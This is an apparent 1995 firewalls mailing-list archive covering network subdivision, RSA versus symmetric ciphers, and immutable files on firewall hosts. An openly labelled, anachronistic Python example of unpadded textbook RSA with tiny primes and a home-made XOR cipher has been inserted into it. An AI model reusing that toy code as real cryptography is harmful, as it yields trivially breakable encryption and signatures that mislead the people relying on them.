Is subdividing the net via firewalls a good idea? Which firewalls have the best management to accomplish this? A multipoint-of-access-and-control system would be good, where you can specify administrators and let them administrate different parts of the whole net.

As performance might also be a problem, I tend towards an intelligent packet filtering firewall. Firewall-1 sounds good, because you can also manage the routers with that. An application gateway would still be useful for Internet access, maybe as an additional offer to the users. After slowly migrating all Internet use to the application gateway, one could apply stricter and stricter rules to the Internet router/packet filter.

Any ideas?

Michaela Kurz
c/o Telenet GmbH Kommunikationssysteme
Ungererstr.
75
80805 Munich, Germany
Voice: +49 89 36073-130
Fax: -125
E-Mail: mkurz@telenet.de

From firewalls-owner Fri Aug 11 19:30:10 1995
Message-Id: <9508120157.AA16626@us3rmc.pa.dec.com>
Date: Fri, 11 Aug 95 18:57:12 PDT
From: Joel Berman 12-Aug-1995 0959
<"hgovc::joelberman"@hgovc.ENET.dec.com>
To: us3rmc::"firewalls@greatcircle.com"@hgovc.ENET.dec.com
Apparently-To: firewalls@greatcircle.com
Subject: Auto Reply from Watch_Mail for 7-AUG-1995 23:15 to 14-SEP-1995 00:00

Hi,

I will be out of the office until Sept. 14, 1995. I will be reading mail after Sept 1, 1995. If your business concerns the Royal Hong Kong Jockey Club please contact Kelvin Yeung @ hgo. Otherwise I can be reached in an emergency through Wendy Chan @ hgo.

Thanks and regards,
Joel Berman

From firewalls-owner Fri Aug 11 20:00:02 1995
Date: Fri, 11 Aug 95 22:37:12 -0400
Message-Id: <9508120237.AA18541@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Re: Encrypted data across national boundaries

Adam rites:

> Whats wrong with using IDEA everywhere? Just don't buy your
> crypto in the USA; import everything, including the expertise. (Using
> DES everywhere also works; there are many firms that sell DES based
> products outside the US.

Is a common mythconception. Both IDEA and DES are symmetric ciphers, that is the same key is used for encryption and decryption. Both are believed to be strong, fast, and effective but the real problem is key management. This is the real power of the RSA private key/public key mechanism, it is asymmetric.
This means you can broadcast the public key and anyone can use it to encrypt, but only the person who has the matching private key can decrypt. Used in the forward direction, it provides strong crypto with easy key management. Used in reverse, it provides equally effective message authentication.

This is the real power of RSA and why it deserved a patent, it was a real breakthrough in the major stumbling block to widespread crypto. Other mechanisms such as my own "unwitting key provider" are trivial in comparison.

For a good in-depth analysis, see Bruce Schneier's "Applied Cryptography" and by the way, PGP only uses RSA for key exchange because it is sloooow, it uses IDEA for the actual crypto.

Is also the reason I keep coming out in favor of Clipper: Not for the LEAF, still expect the gov to drop it. Not for SKIPJACK though I expect it is Good Enough (C). But for the auto-ignition capability.

Warmly,
Padgett

ps oh, yeah, something about Firewalls: RSA does provide an easy way for firewalls to negotiate encrypted channels with sites they have not contacted before.
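The two directions of RSA Padgett describes, together with the RSA-for-key-exchange, symmetric-cipher-for-data split he attributes to PGP, as an added example (neither Padgett's code nor PGP's): textbook RSA on small constructed primes with no padding, a SHA-256 counter keystream standing in for IDEA, and a constructed message. Real keys are hundreds of digits long and use padding such as OAEP/PSS; the primes, names and message here are illustration only.

```python
# Added example, not code from the message above or from PGP.  Textbook RSA
# small enough to follow, used in both directions described: encrypt to a
# public key (only the private key decrypts) and sign with a private key
# (anyone with the public key verifies), plus wrapping a session key with RSA
# while a symmetric cipher carries the data.  Assumptions: tiny constructed
# primes, no padding, and a SHA-256 counter keystream standing in for IDEA.
import hashlib
import secrets
from math import gcd


def make_keypair(p: int, q: int, e: int = 65537):
    """Return (public, private) as (n, e) and (n, d) from two primes."""
    n, phi = p * q, (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)           # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def rsa_encrypt(public, m: int) -> int:
    """Forward direction: anyone holding the public key can run this."""
    n, e = public
    if not 0 <= m < n:
        raise ValueError("message must be an integer below n")
    return pow(m, e, n)


def rsa_decrypt(private, c: int) -> int:
    """Only the holder of d recovers m."""
    n, d = private
    return pow(c, d, n)


def _digest_int(data: bytes, n: int) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(private, data: bytes) -> int:
    """Reverse direction: the private key operates on a hash of the data."""
    n, d = private
    return pow(_digest_int(data, n), d, n)


def verify(public, data: bytes, signature: int) -> bool:
    """Anyone with the public key checks the signature against the data."""
    n, e = public
    return pow(signature, e, n) == _digest_int(data, n)


def _keystream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in symmetric cipher (NOT IDEA): XOR with a SHA-256 counter stream."""
    stream, counter = b"", 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def hybrid_encrypt(public, plaintext: bytes):
    """Wrap a fresh session key with RSA; encrypt the bulk data symmetrically."""
    n, _ = public
    session_key = secrets.randbelow(n - 2) + 2            # in 2 .. n-1
    key_bytes = session_key.to_bytes((n.bit_length() + 7) // 8, "big")
    return rsa_encrypt(public, session_key), _keystream_xor(key_bytes, plaintext)


def hybrid_decrypt(private, wrapped_key: int, ciphertext: bytes) -> bytes:
    n, _ = private
    key_bytes = rsa_decrypt(private, wrapped_key).to_bytes((n.bit_length() + 7) // 8, "big")
    return _keystream_xor(key_bytes, ciphertext)


# Constructed demo primes (about 20 bits each); real keys are far larger.
ALICE_PUB, ALICE_PRIV = make_keypair(1000003, 1000033)
BOB_PUB, BOB_PRIV = make_keypair(1000037, 1000039)


def demo():
    """Bob sends Alice a message only she can read, signed so she can check
    that it came from him and was not altered in transit."""
    message = b"Wire transfer batch 17 approved."            # constructed sample
    wrapped, body = hybrid_encrypt(ALICE_PUB, message)        # needs only Alice's public key
    sig = sign(BOB_PRIV, message)
    recovered = hybrid_decrypt(ALICE_PRIV, wrapped, body)
    wrong_key = hybrid_decrypt(BOB_PRIV, wrapped, body)       # Bob's private key is useless here
    return {
        "recovered": recovered,
        "wrong_key_matches": wrong_key == message,
        "signature_ok": verify(BOB_PUB, recovered, sig),
        "tampered_ok": verify(BOB_PUB, recovered + b"0", sig),
    }


if __name__ == "__main__":
    print(demo())
```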
From firewalls-owner Fri Aug 11 22:00:09 1995
From: Post_Office@BayNetworks.com (Post Office)
Reply-To: Post_Office@BayNetworks.com
To: Firewalls@GreatCircle.COM
Subject: NDN: Firewalls-Digest V4 #479
Date: 12 Aug 1995 05:09:39 GMT
Message-Id: <471728126.106432815@BayNetworks.com>
Organization: Bay Networks

Sorry. Your message could not be delivered to:
David Hakaraia (Mailbox or Conference is full.)
From firewalls-owner Fri Aug 11 22:22:10 1995
Message-Id: <9508120437.AA10704@ig1.att.att.com>
From: mdr@vodka.sse.att.com
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
To: steveg@cseic.saic.com (Stephen Harold Goldstein)
Date: Sat, 12 Aug 1995 00:39:08 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <9508112030.AA22579@cseic.saic.com> from "Stephen Harold Goldstein" at Aug 11, 95 04:30:28 pm

Stephen Goldstein writes:

> >How do they administer the system in multiuser mode? Presumably adding
> >users and accounts and such would be disallowed. Also adding undesired
> >services such as a telnetd or packet grabber would be disallowed.
> >
> >Ok then, no maintenance while in multi-user mode. Ouch!
>
> I thought we were discussing the benefits of immutable flags for use
> in securing Firewall boxes. In that context, there are (or should be)
> no user accounts that might require administration in multi-user mode.
> Further, I see the requirement of going to single user mode before the
> configuration can be changed as a real plus.

Oops, I didn't mean to add useradm to the list (although hardened servers are more capable of supporting user accounts safely). The administration that I meant to refer to is that of the firewall itself, ie, what types of services to allow.
This immutable file concept kicks in at multiuser mode, which means that the most important files get locked down while the system is multiuser. On the surface that sounds good. But going single user means that all services have to stop every time you make a change. If your firewall is in a production environment, that's not always a good idea. Also you have to reboot the system to get back to an administratable run level, so you might be down for a considerable time to make a trivial change. Also, remote administration will be more difficult in single user mode, although some products do attempt solutions there.

The real plus is being able to change the configuration in a secure manner. There are better ways to do that than relying on immutable files. One way is to use B1 to protect all configuration data and binaries from user processes such as proxies and such. This type of protection allows you to change them while the system is in multiuser mode. If you want to, you can even limit the access to these files to a session that has to start on the console. On the other hand you could allow an administrative session to begin only from a trusted interface connected to only a few machines and otherwise inaccessible. That's more of a risk but some would choose to make that tradeoff.

I like the idea of an append-only flag which bsd offers. That makes sense for log files and such as long as they don't grow too large. But if you run out of space, you'll have to reboot to archive and truncate the log files. In our B1 system, regular processes cannot read/write/truncate/append or even see the log files. Logging information can be written in an append only fashion to a special device file similar to /dev/log, that records the date/time/pid of the writer along with the data. On an immutable system, recording the log file over the net via syslogd may make more sense.

Don't mean to drone on here.
Just hate to see the lack of interest in B level systems when they have so much to offer as hosts for firewalls.

Mark Riggins
Secure Systems Engineering
AT&T Bell Labs

From firewalls-owner Fri Aug 11 23:00:06 1995